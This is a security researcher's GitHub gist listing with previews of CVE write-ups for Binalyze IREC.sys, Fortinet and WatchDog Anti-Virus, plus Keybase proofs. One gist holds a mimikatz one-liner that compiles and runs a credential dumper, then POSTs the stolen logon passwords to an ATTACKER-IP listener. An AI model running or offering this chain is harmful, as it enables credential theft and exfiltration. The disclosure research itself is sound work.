Tyler dru1d-foofus

@dru1d-foofus
dru1d-foofus / certparse.py
Created October 21, 2023 19:11
Certipy JSON Parser
#! /usr/bin/env python3
#######################
# Certipy JSON Parser #
# dru1d #
#######################
import json
import argparse
@dru1d-foofus
dru1d-foofus / README.md
Last active May 21, 2024 23:56
CVE-2023-41444 - IREC.sys Vulnerability

CVE-2023-41444 - Binalyze IREC.sys Vulnerable Driver

Credits

Mike Alfaro (@_mmpte_software) and Tyler Booth (@tyler_dru1d)

Description

An issue in Binalyze IREC.sys v.3.11.0 and before allows a local attacker to execute arbitrary code and escalate privileges due to an improper DACL being applied to the device the driver creates.

Vulnerability Type

Incorrect Access Control

@dru1d-foofus
dru1d-foofus / writeup.md
Last active October 14, 2022 15:34
FortiOS / FortiProxy / FortiSwitchManager - Authentication bypass on administrative interface (CVE-2022-40684)

Summary: An authentication bypass using an alternate path or channel vulnerability [CWE-288] in FortiOS, FortiProxy and FortiSwitchManager may allow an unauthenticated attacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.

Exploitation Status: Fortinet is aware of an instance where this vulnerability was exploited, and recommends immediately validating your systems against the following indicator of compromise in the device's logs: user="Local_Process_Access" Source: https://www.fortiguard.com/psirt/FG-IR-22-377; https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/

===Methodology===

A FortiOS 7.0.6 virtual appliance VM was acquired from the Fortinet portal. This was subsequently deployed into a lab environment where further testing would take place.

@dru1d-foofus
dru1d-foofus / File_ACLs.txt
Last active October 20, 2022 16:18
CVE-2022-38611 - WatchDog Anti-Virus Research
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\.sentry-native
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
         NT SERVICE\TrustedInstaller Allow FullControl
         NT SERVICE\TrustedInstaller Allow 268435456
         NT AUTHORITY\SYSTEM Allow FullControl
         NT AUTHORITY\SYSTEM Allow 268435456
         BUILTIN\Administrators Allow FullControl
         BUILTIN\Administrators Allow 268435456
@dru1d-foofus
dru1d-foofus / commands.txt
Last active April 28, 2022 21:44
SubTee's mimikatz magic
Credits: https://github.com/caseysmithrc and https://github.com/xillwillx
#On attacker machine:
#nc -lkvp 80 >> katz-listener.log
#SSL encrypted traffic
#ncat -lkvp 443 --ssl
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://gist.githubusercontent.com/dru1d-foofus/aa8c6894c2be84bb01b1ddeba492134e/raw/a8e703dcb7af9ea02309c71292931670c2ec63f7/katz.cs','katz.cs'); && c:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && c:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe privilege::debug sekurlsa::logonpasswords > katz.txt exit && powershell -ExecutionPolicy Bypass -noLogo -Command (Invoke-WebRequest -Uri http://ATTACKER-IP/$env:ComputerName -Method POST -InFile katz.txt -TimeoutSec 5); exit && del katz.* && exit
#SSL - encrypted traffic
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebCl
@dru1d-foofus
dru1d-foofus / keybase.md
Created February 27, 2017 16:01
keybase.md

Keybase proof

I hereby claim:

  • I am dru1d-foofus on github.
  • I am dru1d (https://keybase.io/dru1d) on keybase.
  • I have a public key whose fingerprint is 51BC 25F6 D8CF 9489 A695 5B2E 75D2 3F1F C023 37F4

To claim this, I am signing this object:

@dru1d-foofus
dru1d-foofus / keybase.md
Created August 1, 2016 18:13
keybase.md

Keybase proof

I hereby claim:

  • I am tylerdru1d on github.
  • I am dru1d (https://keybase.io/dru1d) on keybase.
  • I have a public key whose fingerprint is 16BE 864F AB13 1A3F BAB7 9D68 0A45 A12E 5B78 5293

To claim this, I am signing this object: